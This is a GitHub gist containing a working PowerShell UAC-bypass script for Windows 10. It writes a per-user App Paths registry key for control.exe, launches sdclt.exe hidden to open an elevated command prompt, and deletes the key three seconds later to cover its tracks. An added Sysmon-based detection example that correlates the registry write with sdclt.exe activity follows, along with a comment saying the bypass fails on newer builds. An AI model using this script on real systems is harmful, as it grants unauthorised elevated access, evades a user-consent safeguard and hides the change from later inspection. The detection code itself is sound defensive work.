@netbiosX netbiosX/Sdclt.ps1
Last active Jul 31, 2019

Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Account Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
and starts an elevated command prompt.

.NOTES
Function : SdcltUACBypass
File Name : SdcltUACBypass.ps1
Website : pentestlab.blog

.LINK
https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/

.LINK
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc

.EXAMPLE
SdcltUACBypass

Open Command Prompt (the default).

.EXAMPLE
SdcltUACBypass -program "cmd.exe"

Open a specific application.
#>
function SdcltUACBypass {
    Param (
        [String]$program = "C:\Windows\System32\cmd.exe" # default
    )

    # Create the registry structure
    New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force

    # Start sdclt.exe
    Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden

    # Clean up: the key is removed three seconds after sdclt.exe is started
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
}
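
Detection note: the script removes its key three seconds after starting sdclt.exe, so a point-in-time registry scan will usually miss it, while event telemetry still records the write. The following is an added example, not part of the original gist, that correlates a per-user write to `App Paths\control.exe` with sdclt.exe activity shortly afterwards. It assumes Sysmon-style events (Event ID 13 for registry value set, Event ID 1 for process creation); the function name, the sample events and the SID are constructed for illustration.

```powershell
# Constructed, simplified sample events using Sysmon field names
# (Id 13 = registry value set, Id 1 = process creation). Not real telemetry.
$appPath = 'HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'
$SampleEvents = @(
    [pscustomobject]@{ Id = 13; UtcTime = [datetime]'2019-04-15 10:00:00'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        TargetObject = "$appPath\(Default)"; Details = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Id = 1; UtcTime = [datetime]'2019-04-15 10:00:01'
        Image = 'C:\Windows\System32\sdclt.exe'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
    [pscustomobject]@{ Id = 13; UtcTime = [datetime]'2019-04-15 11:30:00'   # unrelated machine-wide write
        Image = 'C:\Windows\System32\msiexec.exe'
        TargetObject = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\example.exe\(Default)'
        Details = 'C:\Program Files\Example\example.exe' }
)

function Find-AppPathsControlOverride {   # hypothetical helper name
    param([Parameter(Mandatory)] [object[]] $Events, [int] $WindowSeconds = 10)
    # Sysmon reports HKCU as HKU\<SID>; match per-user hives only, never HKLM.
    $keyPattern = '^HKU\\S-1-5-21-[\d-]+\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control\.exe(\\|$)'
    $regWrites  = @($Events | Where-Object { $_.Id -eq 13 -and $_.TargetObject -match $keyPattern })
    $sdclt      = @($Events | Where-Object { $_.Id -eq 1 -and
                    ($_.Image -like '*\sdclt.exe' -or $_.ParentImage -like '*\sdclt.exe') })
    foreach ($w in $regWrites) {
        # sdclt.exe started, or spawning a child, within the window after the write
        $followUps = @($sdclt | Where-Object {
            $delta = ($_.UtcTime - $w.UtcTime).TotalSeconds
            $delta -ge 0 -and $delta -le $WindowSeconds
        })
        $severity = if ($followUps.Count -gt 0) { 'High' } else { 'Medium' }
        [pscustomobject]@{
            UtcTime      = $w.UtcTime
            WritingImage = $w.Image
            RedirectsTo  = $w.Details
            SdcltEvents  = $followUps.Count
            Severity     = $severity
        }
    }
}

Find-AppPathsControlOverride -Events $SampleEvents | Format-List
```

On the sample data only the first write is reported; the HKLM write is ignored because the script's key lives in the per-user hive.
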
@ghost commented Apr 15, 2019

doesn't work in new Windows 10 versions
